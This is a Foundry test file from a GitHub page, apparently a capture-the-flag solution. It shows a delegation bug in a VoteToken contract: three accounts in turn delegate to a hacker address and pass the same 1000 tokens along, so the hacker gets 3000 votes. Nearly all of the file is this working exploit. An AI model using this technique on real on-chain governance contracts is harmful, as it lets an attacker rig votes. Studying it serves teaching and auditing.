-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathVotingMachine.t.sol
53 lines (42 loc) · 1.29 KB
/
VotingMachine.t.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.12;
import "forge-std/Test.sol";
import "../src/VotingMachine.sol";
contract ExploitVotingMachine is Test {
VoteToken vToken;
address public owner = address(0);
address public hacker =address(1337);
address public alice= address(1);
address public bob = address(2);
address public carl = address(3);
function setUp() public {
vm.startPrank(owner);
vToken = new VoteToken();
vToken.mint(alice, 1000);
vm.stopPrank();
}
function testExploit() public {
vm.startPrank(alice);
// soluiton
// 1. Alice delegate to hacker and send balance to Bob
vToken.delegate(hacker);
vToken.transfer(bob, 1000);
vm.stopPrank();
vm.startPrank(bob);
// 2. Bob delegate to hacker and send balance to Carl
vToken.delegate(hacker);
vToken.transfer(carl, 1000);
vm.stopPrank();
vm.startPrank(carl);
// 3. Carl delegate to hacker and send balance to hacker
vToken.delegate(hacker);
vToken.transfer(hacker, 1000);
vm.stopPrank();
uint hacker_vote = vToken.getVotes(hacker);
console.log("Vote Count of Hacker before attack: %s ", hacker_vote);
uint hacker_balance= vToken.balanceOf(hacker);
console.log("Hacker's vToken after the attack: %s: ", hacker_balance);
assertEq(hacker_vote , 3000);
assertEq(hacker_balance, 1000);
}
}